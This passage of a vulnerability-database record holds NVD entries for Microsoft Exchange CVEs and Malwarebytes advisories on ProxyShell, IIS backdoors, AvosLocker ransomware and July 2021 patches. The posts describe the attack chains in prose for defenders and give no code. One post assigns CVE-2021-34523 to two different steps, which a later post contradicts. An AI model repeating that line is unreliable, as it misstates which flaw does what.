"cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2021-07-17T03:31:00", "id": "PRION:CVE-2021-31196", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-31196", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-05-27T14:42:09", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31206, CVE-2021-34473.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T18:15:00", "type": "cve", "title": "CVE-2021-31196", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2021-07-17T03:31:00", "cpe": ["cpe:/a:microsoft:exchange_server:2016", "cpe:/a:microsoft:exchange_server:2013", "cpe:/a:microsoft:exchange_server:2019"], "id": "CVE-2021-31196", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31196", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_9:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_21:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_20:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_10:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:42:10", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-34473.", "cvss3": {"exploitabilityScore": 2.1, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.0, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-14T18:15:00", "type": "cve", "title": "CVE-2021-31206", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 5.5, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.9, "vectorString": "AV:A/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2021-09-20T12:20:00", "cpe": ["cpe:/a:microsoft:exchange_server:2016", "cpe:/a:microsoft:exchange_server:2013", "cpe:/a:microsoft:exchange_server:2019"], "id": "CVE-2021-31206", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31206", "cvss": {"score": 7.9, "vector": "AV:A/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_9:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_21:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_20:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_10:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:30:31", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T18:15:00", "type": "cve", "title": "CVE-2021-34473", "cwe": ["CWE-918"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:microsoft:exchange_server:2016", "cpe:/a:microsoft:exchange_server:2013", "cpe:/a:microsoft:exchange_server:2019"], "id": "CVE-2021-34473", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-34473", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_19:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_20:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_9:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_8:*:*:*:*:*:*"]}], "malwarebytes": [{"lastseen": "2021-08-23T18:35:00", "description": "Last Saturday the Cybersecurity and Infrastructure Security Agency issued an [urgent warning](<https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>) that threat actors are actively exploiting three Microsoft Exchange vulnerabilities\u2014[CVE-2021-34473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>), [CVE-2021-34523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34523>), and [CVE-2021-31207](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31207>). These vulnerabilities can be chained together to remotely execute arbitrary code on a vulnerable machine.\n\nThis set of Exchange vulnerabilities is often grouped under the name ProxyShell. Fixes were available in the [May 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-May>) issued by Microsoft. (To be more precise, the first two were patched in April and CVE-2021-31207 was patched in May.)\n\n### The attack chain\n\nSimply explained, these three vulnerabilities can be chained together to allow a remote attacker to run code on the unpatched server. Attackers use them as follows:\n\n * **Get in** with CVE-2021-31207, a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process.\n * **Take control **with CVE-2021-34523, a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions.\n * **Do bad things** with CVE-2021-34523, a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files.\n\n### ProxyShell\n\nThe Record reports that ProxyShell has been used to [take over some 2,000 Microsoft Exchange mail servers](<https://therecord.media/almost-2000-exchange-servers-hacked-using-proxyshell-exploit/>) in just two days. This can only happen where organisations use the on-premise version of Exchange, and system administrators haven't installed the April and May patches.\n\nWe know there are many reasons why patching is difficult, and often slow. The high number is surprising though, given the noise level about Microsoft Exchange vulnerabilities has been high since [March](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>). Although it may have been muffled by the other alarm cries about PrintNightmare, HiveNightmare, PetitPotam, and many others.\n\n### Ransomware\n\nSeveral researchers have pointed to a ransomware group named LockFile that combines ProxyShell with [PetitPotam](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/microsoft-provides-more-mitigation-instructions-for-the-petitpotam-attack/>). [Kevin Beaumont](<https://twitter.com/GossiTheDog>) has documented how his Exchange honeypot detected exploitation by ProxyShell to drop a [webshell](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>). Later, the threat actor revisited to initiate the staging of artefacts related to the LockFile ransomware. For those interested in how to identify whether their servers are vulnerable, and technical details about the stages in this attack, we highly recommend you read [Kevin Beaumont\u2019s post](<https://doublepulsar.com/multiple-threat-actors-including-a-ransomware-gang-exploiting-exchange-proxyshell-vulnerabilities-c457b1655e9c>).\n\n### PetitPotam\n\nBefore we can point out how ProxyShell can lead to a full blown network-wide ransomware infection we ought to tell you more about PetiPotam. PetitPotam enables a threat actor to launch an NTLM relay attack on domain controllers.\n\nPetitPotam uses the `EfsRpcOpenFileRaw` function of the Microsoft Encrypting File System Remote Protocol (MS-EFSRPC) API. MS-EFSRPC is used for maintenance and management operations on encrypted data that is stored remotely, and accessible over a network. The PetitPotam proof-of-concept (PoC) takes the form of a manipulator-in-the-middle (MitM) attack against Microsoft\u2019s NTLM authentication system. The targeted computer is forced to initiate an authentication procedure and share its authentication details via NTLM.\n\nSince the PetitPotam attack is not based on a vulnerability but uses a legitimate function in a way that was not intended, it will be hard to patch for this attack without \u201cbreaking stuff.\u201d Further, stopping the Encrypting File System (EFS) service does not prevent the technique from being exploited. (For mitigation details, see our post about [PetitPotam](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/microsoft-provides-more-mitigation-instructions-for-the-petitpotam-attack/>).)\n\n### LockFile\n\nLockFile attacks have been recorded mostly in the US and Asia, focusing on organizations in financial services, manufacturing, engineering, legal, business services, travel, and tourism. Symantec pointed out in a [blog post](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lockfile-ransomware-new-petitpotam-windows>) that the ransom note from LockFile ransomware is very similar to the one used by the [LockBit](<http://blog.malwarebytes.com/detections/ransom-lockbit/>) ransomware group and that they reference the Conti gang in their email address. This may mean that members of those gangs have started a new operation, or just be another indication of how all these gangs are [connected, and sharing resources and tactics](<https://blog.malwarebytes.com/ransomware/2021/04/how-ransomware-gangs-are-connected-and-sharing-resources-and-tactics/>).\n\n### Advice\n\nCISA strongly urges organizations to identify vulnerable systems on their networks and immediately apply Microsoft's Security Update from May 2021\u2014which remediates all three ProxyShell vulnerabilities\u2014to protect against these attacks.\n\nWe would like to add that you have a look at the mitigation advice for PetitPotam and prioritize tackling these problems in your updating processes.\n\nStay safe, everyone!\n\nThe post [Patch now! Microsoft Exchange is being attacked via ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-23T13:21:08", "type": "malwarebytes", "title": "Patch now! Microsoft Exchange is being attacked via ProxyShell", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-23T13:21:08", "id": "MALWAREBYTES:6A4862332586F98DA4761BE2B684752F", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-27T16:38:26", "description": "The [Microsoft 365 Defender Research Team](<https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/>) has warned that attackers are increasingly leveraging Internet Information Services (IIS) extensions as covert backdoors into servers.\n\nIIS extensions are able to stay hidden in target environments and as such provide a long-term persistence mechanism for attackers.\n\n## IIS\n\nIIS is webserver software created by Microsoft that runs on Windows systems. Most commonly, organizations use IIS to host ASP.NET web applications and static websites. It can also be used as an FTP server, host WCF services, and be extended to host web applications built on other platforms such as PHP.\n\nExchange Server 2016 and Exchange Server 2019 automatically configure multiple Internet Information Services (IIS) virtual directories during the server installation. As a result, administrators are not always aware of the origin of some directories and their functionality.\n\n## IIS modules\n\nThe IIS 7 and above web server feature set is componentized into more than thirty independent modules. A module is either a Win32 DLL (native module) or a .NET 2.0 type contained within an assembly (managed module). Similar to a set of building blocks, modules are added to the server in order to provide the desired functionality for applications.\n\nMalicious IIS modules are near perfect backdoors. Once installed, they will respond to specifically crafted HTTP requests sent by the operator instructing the server to collect emails, add further malicious access, or use the compromised servers for clandestine purposes. These requests will seem normal to the unsuspicious eye.\n\n## IIS backdoors\n\nIIS backdoors are harder to detect since they mostly reside in the same directories as legitimate modules, and they follow the same code structure as clean modules. The actual backdoor code is hard to detect as such and that also makes it hard to determine the origin.\n\n## ProxyLogon and ProxyShell\n\nSome of the methods used to drop malicious IIS extensions are known as [ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>) and [ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>). ProxyLogon consists of four vulnerabilities which can be combined to form an attack chain that only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, the attackers deploy web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.\n\nThe ProxyShell exploit is very similar to ProxyLogon and was discovered more recently. ProxyShell is a different attack chain designed to exploit three separate vulnerabilities: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207.\n\n## Malicious behavior\n\nOn its blog, the Microsoft Team describes a custom IIS backdoor called FinanceSvcModel.dll which has a built-in capability to perform Exchange management operations, such as enumerating installed mailbox accounts and exporting mailboxes for exfiltration. What's interesting in this example is how the threat actor forced the system to use the WDigest protocol for authentication, resulting in lsass.exe retaining a copy of the user\u2019s plaintext password in memory. This allowed the threat actor to steal the actual passwords and not just the hashes.\n\nCredential stealing can be a goal by itself. But stolen credentials also allow the attackers to remain persistent in the environment, even if the primary backdoor is detected. Credential stealing modules monitor for specific requests to determine a sign-in activity and dump the provided credentials in a file the threat actor can retrieve later.\n\nGiven the rising energy prizes and the falling, yet still profitable, cryptocurrency exchange rates, we wouldn\u2019t be surprised to find servers abused for cryptomining. A few years ago we saw threat actors leveraging an [IIS 6.0 vulnerability](<https://www.bleepingcomputer.com/news/security/windows-servers-targeted-for-cryptocurrency-mining-via-iis-flaw/>) to take over Windows servers and install a malware strain that mined the Electroneum cryptocurrency.\n\n## Mitigation, detection, and remediation\n\nThere are several thing you can do to minimize the risk and consequences of a malicious IIS extension:\n\n * Keep your server software up to date to minimize the risk of infection.\n * Use security software that also covers your servers.\n * Regularly check loaded IIS modules on exposed IIS servers (notably Exchange servers), leveraging existing tools from the IIS servers suite.\n * Deploy a backup strategy that creates regular backups that are easy to deploy when needed.\n * Review permission and access policies, combined with credential hygiene.\n * Prioritize alerts that show patterns of server compromise. It can help to catch attacks in the exploratory phase, the period in which attackers spend time exploring the environment after gaining initial access.\n\nStay safe, everyone!\n\nThe post [IIS extensions are on the rise as backdoors to servers](<https://blog.malwarebytes.com/reports/2022/07/iis-extensions-are-on-the-rise-as-backdoors-to-servers/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-27T13:58:06", "type": "malwarebytes", "title": "IIS extensions are on the rise as backdoors to servers", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-07-27T13:58:06", "id": "MALWAREBYTES:B0F2474F776241731FE08EA7972E6239", "href": "https://blog.malwarebytes.com/reports/2022/07/iis-extensions-are-on-the-rise-as-backdoors-to-servers/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-21T21:27:45", "description": "The FBI has issued an[ advisory](<https://www.ic3.gov/Media/News/2022/220318.pdf>) about the AvosLocker ransomware. Notably the FBI has noticed that several victims have reported Microsoft Exchange Server vulnerabilities as the intrusion vector. \n\nAvosLocker is a Ransomware as a Service (RaaS) affiliate-based group that has targeted victims across multiple critical infrastructure sectors in the United States including financial services, critical manufacturing, and government facilities.\n\n## Threat profile\n\nAvosLocker ransomware is a multi-threaded Windows executable written in C++ that runs as a console application and shows a log of actions performed on victim systems. AvosLocker ransomware encrypts files on a victim\u2019s server and renames them with the \u201c.avos\u201d extension.\n\nThe AvosLocker executable leaves a ransom note called GET_YOUR_FILES_BACK.txt in all directories where encryption occurs. The ransom note includes a .onion site that contains instructions for paying the ransom and receiving a decryption key.\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2022/03/ransom_note-1-600x313.png)\n\n> _Attention!_\n> \n> _Your systems have been encrypted, and your confidential documents were downloaded._\n> \n> _In order to restore your data, you must pay for the decryption key & application._\n> \n> _You may do so by visiting us at <onion address>._\n> \n> _This is an onion address that you may access using Tor Browser which you may download at <https://www.torproject.org/download/>_\n> \n> _Details such as pricing, how long before the price increases and such will be available to you once you enter your ID presented to you below in this note in our website._\n> \n> _Contact us soon, because those who don\u2019t have their data leaked in our press release blog and the price they\u2019ll have to pay will go up significantly._\n> \n> _The corporations whom don\u2019t pay or fail to respond in a swift manner have their data leaked in our blog, accessible at <onion address>_\n\nSo, besides encrypting your files, AvosLocker also exfiltrates data and threatens to publish the stolen data to its leaks site. The public leak site not only lists victims of AvosLocker, along with a sample of data allegedly stolen from the victim\u2019s network, but also gives visitors an opportunity to view a sample of victim data and to purchase that data.\n\nThe FBI also notes that in some cases, AvosLocker victims receive phone calls from an AvosLocker representative. The caller encourages the victim to go to the .onion site to negotiate, and threatens to post stolen data online. In some cases, AvosLocker actors will threaten and execute distributed denial-of-service (DDoS) attacks during negotiations.\n\n## Exchange vulnerabilities\n\nSince AvosLocker is a Ransomware-as-a-Service it may depend on the affiliate which of the vulnerabilities gets used.\n\nThe Exchange Server vulnerabilities are named as: CVE-2021-31207, CVE-2021-34523, and CVE-2021-34473, and CVE-2021-26855.\n\n[CVE-2021-31207](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31207>): a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process. This is the way in.\n\n[CVE-2021-34523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34523>): a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions. This is how they take control.\n\n[CVE-2021-34473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>): a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files. This allows the attacker to drop malware on the server and run it.\n\nThis is exactly the same attack chain we [described](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>) in August 2021. This chain of attack was generally referred to as ProxyShell.\n\nAnother RCE vulnerability in Exchange Server has been seen as well:\n\n[CVE-2021-26855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855>): the ProxyLogon vulnerability which we discussed in detail in our article on [Microsoft Exchange attacks causing panic as criminals go shell collecting](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>). The vulnerability allows an attacker to drop a webshell on a vulnerable Exchange Server. A web shell is a script used by an attacker that allows them to escalate and maintain persistent access on an already compromised web application. (Obviously, not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)\n\n## Mitigation\n\nAs we stated earlier, all these vulnerabilities have been patched. So, if you are wondering which updates to install next and you are running one or more Microsoft Exchange Server instances, starting there might be a good idea.\n\nMicrosoft\u2019s team has published a [script on GitHub](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) that can check the status of protection against ProxyLogon vulnerabilities of Exchange servers.\n\n## Detection\n\nMalwarebytes detects AvosLocker as [Ransom.AvosLocker](<https://blog.malwarebytes.com/detections/ransom-avoslocker/>).\n\n![](https://blog.malwarebytes.com/wp-content/uploads/2022/03/detection-2.png)_Malwarebytes blocks Ransom.AvosLocker_\n\nStay safe, everyone!\n\nThe post [AvosLocker ransomware uses Microsoft Exchange Server vulnerabilities, says FBI](<https://blog.malwarebytes.com/ransomware/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-21T21:09:12", "type": "malwarebytes", "title": "AvosLocker ransomware uses Microsoft Exchange Server vulnerabilities, says FBI", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2022-03-21T21:09:12", "id": "MALWAREBYTES:B830332817B5D5BEE99EF296E8EC7E2A", "href": "https://blog.malwarebytes.com/ransomware/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-20T08:33:57", "description": "The list of July 2021 Patch Tuesday updates looks endless. 117 patches with no less than 42 CVEs assigned to them that have FAQs, mitigations details or workarounds listed for them. Looking at the urgency levels Microsoft has assigned to them, system administrators have their work cut out for them once again:\n\n * 13 criticial patches\n * 103 important patches\n\nYou can find the list of CVEs that have FAQs, mitigations, or workarounds on the Microsoft [July release notes](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Jul>) page.\n\nSix vulnerabilities were previously disclosed and four are being exploited in-the-wild, according to Microsoft. One of those CVE\u2019s is a familiar one, [2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) aka the anyone-can-run-code-as-domain-admin RCE known as [PrintNightmare](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/printnightmare-0-day-can-be-used-to-take-over-windows-domain-controllers/>). Microsoft issued out-of-band patches for that vulnerability a week ago, but those were [not as comprehensive](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/patch-now-emergency-fix-for-printnightmare-released-by-microsoft/>) as one might have hoped. \n\nSince then, the Cybersecurity and Infrastructure Security Agency\u2019s (CISA) has issued [Emergency Directive 21-04](<https://cyber.dhs.gov/ed/21-04/>), \u201cMitigate Windows Print Spooler Service Vulnerability\u201d because it is aware of active exploitation, by multiple threat actors, of the PrintNightmare vulnerability. These directive list required actions for all Federal Civilian Executive Branch agencies.\n\n### Priorities\n\nBesides the ongoing PrintNightmare, er, nightmare, there are some others that deserve your undivided attention. Vulnerabilities being exploited in the wild, besides PrintNightmare, are:\n\n * [CVE-2021-34448](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34448>) Scripting Engine Memory Corruption Vulnerability for Windows Server 2012 R2 and Windows 10.\n * [CVE-2021-33771](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33771>) Windows Kernel Elevation of Privilege Vulnerability for Windows Server 2012, Server 2016, Windows 8.1, and Windows 10.\n * [CVE-2021-31979](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31979>) Windows Kernel Elevation of Privilege Vulnerability for Windows 7, Windows 8.1, Windows 10, Windows Server 2008, Windows Server 2012, Windows Server 2016, and Windows Server 2019.\n\nOther vulnerabilities that are not seen exploited in the wild yet, but are likely candidates to make that list soon:\n\n * [CVE-2021-34458](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34458>) Windows Kernel Remote Code Execution Vulnerability for some Windows Server versions, if the system is hosting virtual machines, or the Server includes hardware with SR-IOV devices.\n * [CVE-2021-34494](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34494>) Windows DNS Server Remote Code Execution Vulnerability for Windows Server versions if the server is configured to be a DNS server.\n\n### Exchange Server\n\nAnother ongoing effort to patch vulnerable systems has to do with Microsoft Exchange Server. Flaws that were actually already [patched in April](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>) have now been assigned new CVE numbers [CVE-2021-34473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>) (Microsoft Exchange Server Remote Code Execution Vulnerability) and [CVE-2021-34523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34523>) (Microsoft Exchange Server Elevation of Privilege Vulnerability). As you may remember this combo of elevation of privilege (EOP) and remote code execution (RCE) caused quite the [panic](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>) when attackers started using the Exchange bugs to access vulnerable servers before establishing web shells to gain persistence and steal information.\n\nIf you applied the patches in April, you are already protected. If you didn\u2019t, move them to the top of your to-do-list.\n\n### Windows Media Foundation\n\nTwo other critical vulnerabilities, and one considered important, were found in Microsoft Windows Media Foundation. Microsoft Media Foundation enables the development of applications and components for using digital media on Windows Vista and later. If you do have this multimedia platform installed on your system you are advised to apply the patches, but note that many of them include the [Flash](<https://blog.malwarebytes.com/awareness/2021/01/adobe-flash-player-reaches-end-of-life/>) Removal Package. So do the patches for 